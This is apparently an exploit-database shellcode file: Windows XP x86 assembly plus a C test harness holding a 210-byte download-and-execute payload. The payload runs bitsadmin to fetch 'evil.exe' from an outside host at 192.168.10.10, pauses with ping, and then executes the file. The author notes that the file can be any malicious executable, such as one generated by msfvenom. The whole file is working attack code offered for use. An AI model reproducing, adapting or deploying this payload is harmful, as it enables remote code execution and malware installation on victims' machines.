/* ; Shellcode Title : bitsadmin download and execute ; Shellcode Author : Joseph McDonagh ; Date June 26, 2019 ; Shellcode Length 210 ; However, if the application you are exploiting already loads it, then all you need ... ; ... is the System Call and ExitProcess in kernel32.dll ; In between download and execute is ping -n 30 localhost, which provides a delay for the ... ; ... relatively slow bitsadmin.exe program ; Tested on Windows XP SP2 ; Acknowledgement to Kartik Durg, who inspired me to start making my own shellcode ; after reading iamroot blog ; Acknowledgement to POB, using start has really helped me alot in manual shellcode efforts ; start bitsadmin.exe /transfer "njob30" http://192.168.10.10/evil.exe "c:\evil.exe" && ping -n 30 127.0.0.1 && cmd.exe /c c:\evil.exe ; evil.exe can be generated by msfvenom, or be ANY malcious executable you happen to have ; ; EDB-Note: start bitsadmin.exe /transfer "n job30" http://192.168.10.10/evil.exe "c:\evil.exe" && ping -n 30 127.0.0.1 && cmd.exe /c c:\evil.exe xor eax, eax ;Get the msvcrt.dll mov ax, 0x7472 ;"tr\0\0" push eax push dword 0x6376736d ;"cvsm" push esp ; LoadLibrary mov ebx, 0x7c801d77 ;Address of function LoadLibraryA (winxp) call ebx mov ebp, eax ;msvcrt.dll is saved in ebp xor eax, eax push eax push 0x6578652e ; exe. push 0x6c697665 ; live push 0x5c3a6320 ; \:c push 0x632f2065 ; c/ e push 0x78652e64 ; xe.d push 0x6d632026 ; mc & push 0x2620312e ; & 1. push 0x302e302e ; 0.0. push 0x37323120 ; 721 push 0x3033206e ; 03 n push 0x2d20676e ; - gn push 0x69702026 ; ip & push 0x26202265 ; & "e push 0x78652e6c ; xe.l push 0x6976655c ; ive\ push 0x3a632220 ; :c" push 0x6578652e ; exe. push 0x6c697665 ; live push 0x2f30312e ; /01. push 0x30312e38 ; 01.8 push 0x36312e32 ; 61.2 push 0x39312f2f ; 91// push 0x3a707474 ; :ptt push 0x68202230 ; h "0 push 0x33626f6a ; 3boj push 0x6e222072 ; n" r push 0x6566736e ; efsn push 0x6172742f ; art/ push 0x20657865 ; exe push 0x2e6e696d ; .nim push 0x64617374 ; dast push 0x69622074 ; ib t push 0x72617473 ; rats mov edi,esp push edi mov eax, 0x77c293c7 call eax xor eax, eax push eax mov eax, 0x7c81caa2 call eax */ char code[]= "\x31\xc0\x66\xb8\x72\x74\x50\x68\x6d\x73\x76\x63\x54\xbb\x77\x1d\x80\x7c\xff\xd3\x89\xc5\x31\xc0\x50\x68\x2e\x65\x78\x65\x68\x65\x76\x69\x6c\x68\x20\x63\x3a\x5c\x68\x65\x20\x2f\x63\x68\x64\x2e\x65\x78\x68\x26\x20\x63\x6d\x68\x2e\x31\x20\x26\x68\x2e\x30\x2e\x30\x68\x20\x31\x32\x37\x68\x6e\x20\x33\x30\x68\x6e\x67\x20\x2d\x68\x26\x20\x70\x69\x68\x65\x22\x20\x26\x68\x6c\x2e\x65\x78\x68\x5c\x65\x76\x69\x68\x20\x22\x63\x3a\x68\x2e\x65\x78\x65\x68\x65\x76\x69\x6c\x68\x2e\x31\x30\x2f\x68\x38\x2e\x32\x36\x68\x32\x2e\x31\x36\x68\x2f\x2f\x31\x39\x68\x74\x74\x70\x3a\x68\x30\x22\x20\x68\x68\x6a\x6f\x62\x33\x68\x72\x20\x22\x6e\x68\x6e\x73\x66\x65\x68\x2f\x74\x72\x61\x68\x65\x78\x65\x20\x68\x6d\x69\x6e\x2e\x68\x74\x73\x61\x64\x68\x74\x20\x62\x69\x68\x73\x74\x61\x72\x89\xe7\x57\xb8\xc7\x93\xc2\x77\xff\xd0\x31\xc0\x50\xb8\xa2\xca\x81\x7c\xff\xd0"; int main(int argc, char **argv) { int (*func)(); func = (int (*)()) code; (int)(*func)(); }